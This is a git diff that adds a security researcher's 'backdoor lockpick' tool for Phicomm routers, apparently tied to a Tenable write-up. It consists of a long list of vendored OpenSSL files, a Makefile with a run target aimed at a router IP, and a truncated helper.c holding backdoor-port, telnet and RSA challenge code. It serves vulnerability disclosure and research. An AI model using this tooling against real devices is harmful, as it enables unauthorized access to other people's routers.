 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND1_Issuer_ICA.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND2_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WKIC_ND3_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D1.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D2.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_D3.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND1.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND2.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WRID_ND3.ors
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D1_Issuer_ICA.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D2_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_D3_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND1_Issuer_ICA.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND2_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/WSNIC_ND3_Issuer_Root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7-1.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkcs7.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/pkits-test.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/r160test.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/randtest.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc2test.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc4test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc5test.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rmdtest.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rsa_test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/serverinfo.pem
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha1test.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha256t.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha512t.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/shatest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smcont.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/ca.cnf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/mksmime-certs.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdh.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa1.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa2.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa3.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsap.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec1.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smec2.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smroot.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa1.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa2.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa3.pem
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/srptest.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ssltest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test.cnf
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test_padlock
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testcrl.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testenc.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testfipsssl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testgen.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testp7.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testreq2.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testrsa.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tests.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsid.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testss.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testssl.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsslproxy
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testutil.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testx509.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/times
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tpkcs7d.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/treq.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tverify.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert1.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert2.pem
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3nametest.c
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/wp_test.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/090/586-100.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/486-50.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/586-100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/68000.bsd
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/686-200.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha064.osf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/alpha164.osf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/mips-rel.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r10000.irx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r3000.ult
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/091/r4400.irx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/100.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/200.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.dos
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.w31
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/5.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-085i.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.LN3
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.NT2
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.dos
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ln4
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ntx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.w31
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-1002.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586p-100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.bsd
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/686-200.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/L1
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R10000.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/R4400.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aix.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/aixold.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/alpha400.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/cyrix100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux-x86.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/dgux.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-acc.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux-kr.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/p2.w95
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/pent2.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/readme
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.nt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sgi.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc2
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparcLX.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/usparc.t
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/bfs.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/casts.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/des3s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/dess.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md4s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md5s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/rc4s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/sha1s.cpp
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/Makefile
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c89.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_hash
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_info
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_issuer
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_name
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.in
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/FreeBSD.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/add_cr.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/bat.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ck_errf.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/clean-depend.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy-if-different.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/copy.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/cygwin.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deleof.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/deltree.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/dirname.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/do_ms.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/domd
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/err-ins.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-names.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/extract-section.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/files.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/fixNT.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/indent.pro
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/install.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/libeay.num
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mk1mf.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkbuildinf.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkcerts.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdef.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkdir-p.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkerr.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkfiles.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mklink.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkrc.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkstack.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/openssl-format-source
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/opensslwrap.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/perlpath.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/BC-32.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/Mingw32.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/OS2-EMX.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/VC-32.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/linux.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/netware.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/ultrix.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/unix.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2man.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pod2mantest.pod
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/point.sh
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/selftest.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/shlib_wrap.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/sp-diff.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/speed.sh
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/src-dep.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/ssleay.num
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/su-filter.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/tab_num.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/x86asm.sh

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/.gitignore b/Phicomm/backdoor-lockpick_tra-2022-01/.gitignore
new file mode 100644
index 0000000..1377554
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/.gitignore
@@ -0,0 +1 @@
+*.swp
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/Makefile
new file mode 100644
index 0000000..75984d0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/Makefile
@@ -0,0 +1,40 @@
+export C_INCLUDE_PATH=/usr/lib/musl/include
+LDFLAGS=-Llib/libcrypto.a -static 
+DEBUG=-O0 -g
+RELEASE=-Os
+OPENSSL_DIR=openssl-1.0.2
+CFLAGS=-I$(OPENSSL_DIR)/include -Wall $(DEBUG)
+CC=musl-gcc
+OUT=lockpick
+
+$(OUT): lockpick.c lib/libcrypto.a
+	$(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS)
+	# strip $(OUT)
+
+libs: lib/libcrypto.a lib/libtelnet.a
+
+lib/libcrypto.a: openssl-1.0.2/libcrypto.a
+	mkdir -p lib/
+	cp $< lib/
+
+lib/libtelnet.a: libtelnet-0.23/.libs/libtelnet.a
+	mkdir -p lib/
+	cp $< lib/
+
+libtelnet-0.23/.libs/libtelnet.a:
+	./mk-libtelnet.sh
+
+openssl-1.0.2/libcrypto.a:
+	./mk-libcrypto.sh
+
+test: $(OUT)
+	./$(OUT) test
+
+run: $(OUT)
+	./$(OUT) 192.168.98.1
+
+clean: 
+	rm -f lockpick libcrypto.a
+
+distclean: clean
+	make -C openssl-1.0.2 clean
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/README.md b/Phicomm/backdoor-lockpick_tra-2022-01/README.md
new file mode 100644
index 0000000..ad58358
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/README.md
@@ -0,0 +1,3 @@
+# A Backdoor Lockpick
+
+See our full writeup [HERE](https://medium.com/tenable-techblog/a-backdoor-lockpick-d847a83f4496).
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/helper.c b/Phicomm/backdoor-lockpick_tra-2022-01/helper.c
new file mode 100644
index 0000000..9b25644
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/helper.c
@@ -0,0 +1,807 @@
+#include <stdio.h>
+#include <sys/time.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <openssl/bn.h>
+//#include <openssl/err.h>
+#include <openssl/md5.h>
+#include <openssl/rsa.h>
+
+#define SCAN_DELAY  300000
+#define STAGE_DELAY 100000
+#define BACKDOOR_PORT 21210
+#define TELNET_PORT 23
+#define PLAINTEXT_LENGTH 0x20
+#define CIPHERTEXT_LENGTH 0x80
+#define MAX_TRIES 2048
+
+#define NO_FLAGS 0
+#define WIPE() { memset(plaintext, 0, PLAINTEXT_LENGTH+1); memset(ciphertext, 0, CIPHERTEXT_LENGTH); }
+
+
+
+
+void print_from(struct sockaddr_in *from) {
+  char *ns;
+  ns = inet_ntoa(from->sin_addr);
+  fprintf(stdout, "[<] remote address %s:%d\n", ns, ntohs(from->sin_port) & 0xFFFF);
+  return;
+}
+
+/////// Hexdump code
+
+void fhexdump(FILE *fd, unsigned char *data, int len) {
+  int i;
+  for (i = 0; i < len; i++) {
+    if (i % 16 == 0) {
+      fprintf(fd, "\n");
+    } else if (i % 8 == 0) {
+      fprintf(fd, "  ");
+    } else {
+      fprintf(fd, " ");
+    }
+    fprintf(fd, "%02x", data[i]);
+  }
+  fprintf(fd, "\n\n");
+}
+
+
+void hexdump(unsigned char *data, int len) {
+  fhexdump(stdout, data, len);
+}
+
+
+void bar(char ch) {
+  int i;
+  for (i = 0; i < 65; i++) {
+    putc(ch, stdout);
+  }
+  putc('\n', stdout);
+  return;
+}
+
+
+////// MD5 Code
+
+int md5raw(unsigned char *out, const unsigned char *in, int len) {
+  MD5_CTX c;
+  MD5_Init(&c);
+  MD5_Update(&c, in, len);
+  MD5_Final(out, &c);
+  return 0;
+}
+
+unsigned char *device_identifying_hash(const char *identifier) {
+  unsigned char buffer[0x80];
+  unsigned char *hash;
+  hash = calloc(16, sizeof(char));
+  memset(buffer, 0, 0x80);
+  strcpy((char *) buffer, identifier);
+  md5raw(hash, (const unsigned char *) buffer, 0x80);
+  return hash;
+}
+
+////// RSA stuff
+
+
+
+
+
+RSA *init_rsa(const char *public_n, const char *public_e) {
+  BIGNUM *e;
+  BIGNUM *n;
+  RSA *rsa;
+  rsa = RSA_new();
+  n = BN_new();
+  e = BN_new();
+  BN_hex2bn(&n, public_n);
+  BN_hex2bn(&e, public_e);
+  rsa->e = e;
+  rsa->n = n;
+  return rsa;
+}
+
+
+int decrypt_with_pubkey(RSA *rsa, unsigned char *ciphertext, unsigned char *plaintext) {
+  int sz;
+  memset(plaintext, 0, PLAINTEXT_LENGTH);
+  sz = RSA_size(rsa);
+  fprintf(stderr, "[-] RSA_size(rsa) = %d\n", sz);
+  return RSA_public_decrypt(sz, ciphertext, plaintext, rsa, RSA_NO_PADDING);
+}
+
+
+int encrypt_with_pubkey(RSA *rsa, unsigned char *plaintext, unsigned char *ciphertext) {
+  int sz;
+  memset(ciphertext,0,CIPHERTEXT_LENGTH);
+  sz = RSA_size(rsa);
+  fprintf(stderr, "[-] RSA_size(rsa) = %d\n", sz);
+  return RSA_public_encrypt(sz, plaintext, ciphertext, rsa, RSA_NO_PADDING); 
+}
+
+
+//// RSA test code
+//
+//
+
+
+/***
+ *
+ * Expected test case
+ *
+=====
+S<:2\\fPve:j%lJ$j%A[DGQ-v|p,-;Tr
+-----
+	0xdd	0x02	0x0a	0x44	0x45	0x84	0xbd	0xf4
+	0x86	0x8f	0x32	0xa3	0xad	0xbf	0x25	0x06
+	0x5b	0x5a	0x75	0x9c	0x06	0xb1	0xad	0xf5
+	0xb1	0x41	0x0e	0xaa	0xcc	0x61	0xcc	0x01
+	0xfd	0x59	0xb8	0xbd	0x7b	0x19	0x17	0x78
+	0xa2	0x77	0xac	0xae	0x40	0x43	0x5a	0xa8
+	0x25	0x78	0xda	0x6c	0xae	0x93	0x56	0xb7
+	0xc2	0x47	0x14	0x1b	0xb0	0xef	0x70	0xc3
+	0x95	0x27	0x3d	0x3c	0xde	0x3c	0x34	0x21
+	0xf4	0xc7	0xef	0xf0	0xa0	0x7a	0xff	0xf4
+	0x66	0x5f	0xdf	0x19	0x57	0x5e	0xe5	0x92
